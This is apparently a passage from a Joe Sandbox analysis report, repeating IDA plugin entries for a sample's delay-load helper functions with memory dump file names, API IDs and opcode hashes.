                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 211815cd92171f5f11881fd5abb518169dbc470eaf81ddc19a7e687f4804fc44
                                        • Instruction ID: 8e404e154982b274036f3df039c6dc0d1e8da15b81dfee3856d4bba4d2b0586c
                                        • Opcode Fuzzy Hash: 211815cd92171f5f11881fd5abb518169dbc470eaf81ddc19a7e687f4804fc44
                                        • Instruction Fuzzy Hash: FCB012D5359180FC350412461C43D3B01CCC1C2B1033084BEFC21D0480E980FE421831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 87a8b49ed4eedc1c4de433efe3f01288d1dc1d33342456ddbdd9c4e0e3689833
                                        • Instruction ID: b5f3623e4e0b250e53ccc145bf8e5c124a97763edff15ef23c6afeecb5fa5f9d
                                        • Opcode Fuzzy Hash: 87a8b49ed4eedc1c4de433efe3f01288d1dc1d33342456ddbdd9c4e0e3689833
                                        • Instruction Fuzzy Hash: 19B012E1299080FC310452061D03E3B01ECC1C1B1033040BEF825D0080ED40FF421831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: d1770a1e324e8f74b572af423bcd6ed58d6bf5bcef4efa2107f146949e0dbd86
                                        • Instruction ID: 1b4af7f08f1fe431dabe9b37506327f37986e0d3b03d4ccf378938e8b87904cc
                                        • Opcode Fuzzy Hash: d1770a1e324e8f74b572af423bcd6ed58d6bf5bcef4efa2107f146949e0dbd86
                                        • Instruction Fuzzy Hash: 52B012E1259080FC320452071C03E3B01CCD1C1F1033040BEF826C0080EA40FF411831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 4fa26e6b6acd78e2678f87d3757362217b13db4ba78024c7d67154d091c5bae5
                                        • Instruction ID: 5c79194ab9b7350d595d88d8ac2b38ef705e3833111c923e6ed7712018403b4c
                                        • Opcode Fuzzy Hash: 4fa26e6b6acd78e2678f87d3757362217b13db4ba78024c7d67154d091c5bae5
                                        • Instruction Fuzzy Hash: 5DB012E1299080FC320452061D03E3B01CCC1C1F1033040BEF826D0080EE40FF421831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 9746a2b5ce971c77318c0f8b53005c5f60a0cb3425771a612112619f0dc732e2
                                        • Instruction ID: ebe9afa53eb7ece60b83248398ae2d47d1f341dc302e5d83d0275dc7fa0480d5
                                        • Opcode Fuzzy Hash: 9746a2b5ce971c77318c0f8b53005c5f60a0cb3425771a612112619f0dc732e2
                                        • Instruction Fuzzy Hash: BAB012E1259180FC324452061C03E3B05CCC1C1F1033041BEFC26C0080EA40FF811831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 0cc26f7b9f81c9cb02951977db8889dbb8ef2609c455ba066d9fa76f585baafe
                                        • Instruction ID: 180fc737d0dda7e33de09f99984ca1d58d645ddf3a929a43b5be4bebc2d388fc
                                        • Opcode Fuzzy Hash: 0cc26f7b9f81c9cb02951977db8889dbb8ef2609c455ba066d9fa76f585baafe
                                        • Instruction Fuzzy Hash: A7B012E1259080FC360452061C03E3B01CCC1C2F1033080BEFC26C0080EA40FF411831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: cc6760bb5b8db5684cb99a55f1fd5f8ee50fb729417968491ef4b110a43116f9
                                        • Instruction ID: f9ce9ad8b6068790d99df47c5456d7bf57fcc480ccaca805f32f45d79b77b5b5
                                        • Opcode Fuzzy Hash: cc6760bb5b8db5684cb99a55f1fd5f8ee50fb729417968491ef4b110a43116f9
                                        • Instruction Fuzzy Hash: 43B012D1399080FC310453061D03E3B01CCC2C2B1033080BEF825D0180ED50FF4A1831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 2e2d9f3fc33ff08b1f33ca33ea63551c73f1c7128f9b3c04ed4625ed179aedc7
                                        • Instruction ID: 9260814bbd90ec47ebbd4cc223d90894424602df30275e52a5e05d62ed93211d
                                        • Opcode Fuzzy Hash: 2e2d9f3fc33ff08b1f33ca33ea63551c73f1c7128f9b3c04ed4625ed179aedc7
                                        • Instruction Fuzzy Hash: 18B012D13591C0FC314453061C03E3B05CCC2C2B1033081BEFC25C0180E940FE851831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: d2bdc267af57553477d0944b0bedbc0ec601da3abf7b26cc8cbb0cdbb995eefb
                                        • Instruction ID: ddfae4301e63178638106524ed1ffa6ae445d4b851840cae4fd662700a7411f0
                                        • Opcode Fuzzy Hash: d2bdc267af57553477d0944b0bedbc0ec601da3abf7b26cc8cbb0cdbb995eefb
                                        • Instruction Fuzzy Hash: A6B012D1259080FC350452561C03E3B01DCC1C2B1033080BEFC25C0080EA40FE411831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: b25ebcd16d3f12d675ccd49392a9cdcf35aef3917c6ebeb71f4cdb329ad103fd
                                        • Instruction ID: a143e8cde4dae8471ca7e9e8e12728a6604701d9b6afb2063b4ff234e0ce1e97
                                        • Opcode Fuzzy Hash: b25ebcd16d3f12d675ccd49392a9cdcf35aef3917c6ebeb71f4cdb329ad103fd
                                        • Instruction Fuzzy Hash: 95B012D126A0C0FC310452061C03E3B01CDD5C1B2033080BEF826C4080E940FE411831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 41485a1268b9e8958c273ebca12f875981b8f98fab7e9d4ffd565d26ed5cd125
                                        • Instruction ID: 3d19ef0607736038918308611f861589c84dcc64add09fd45fe4722b10550751
                                        • Opcode Fuzzy Hash: 41485a1268b9e8958c273ebca12f875981b8f98fab7e9d4ffd565d26ed5cd125
                                        • Instruction Fuzzy Hash: 74B012E125A1C0FC314453061C03E3B05CDC1C1B2033081BEFC25C4080E940FE851831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE1E3
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 7522d30bcbfb51fc466fb88d0e909246e21c4f2b1e6716346030e95fa2bab786
                                        • Instruction ID: 5c026e44264e2e08f137a898f7704356a5f528b4c7f418f2d643a61110333a3c
                                        • Opcode Fuzzy Hash: 7522d30bcbfb51fc466fb88d0e909246e21c4f2b1e6716346030e95fa2bab786
                                        • Instruction Fuzzy Hash: 8DB012D125A0C0FC350452071C03E3B01CDC1C2B20330C0BEFC25C4080E940FE411831
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE3FC
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: fe8e66525fcaaf3ae3d5215df3286b1a2f974b22dc2b60e8e5dee4dbda94d088
                                        • Instruction ID: 1d378572e2f0c935e7729736bdcd3eeab8913aea13f3ed2697872cd9db885f93
                                        • Opcode Fuzzy Hash: fe8e66525fcaaf3ae3d5215df3286b1a2f974b22dc2b60e8e5dee4dbda94d088
                                        • Instruction Fuzzy Hash: C2B012F12590C0FC374491051C03E3702CCC0C5F1033080EEF825C6080E840DE411437
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE3FC
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
                                          • Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                        • Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 13b92690347412917a7f19e71422bb6a799ebfcbce2d9b25092ed10e5427fe6b
                                        • Instruction ID: 14ab30df67a5df2dab5bcad517c4c32f76c59672ab74d8dcd63ad67870e0161d
                                        • Opcode Fuzzy Hash: 13b92690347412917a7f19e71422bb6a799ebfcbce2d9b25092ed10e5427fe6b
                                        • Instruction Fuzzy Hash: 61B012E13590C0FC324451051D03E7702CCC1C5B10330C0EEF525D6080E9409C4A1437
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00BCE3FC
                                          • Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
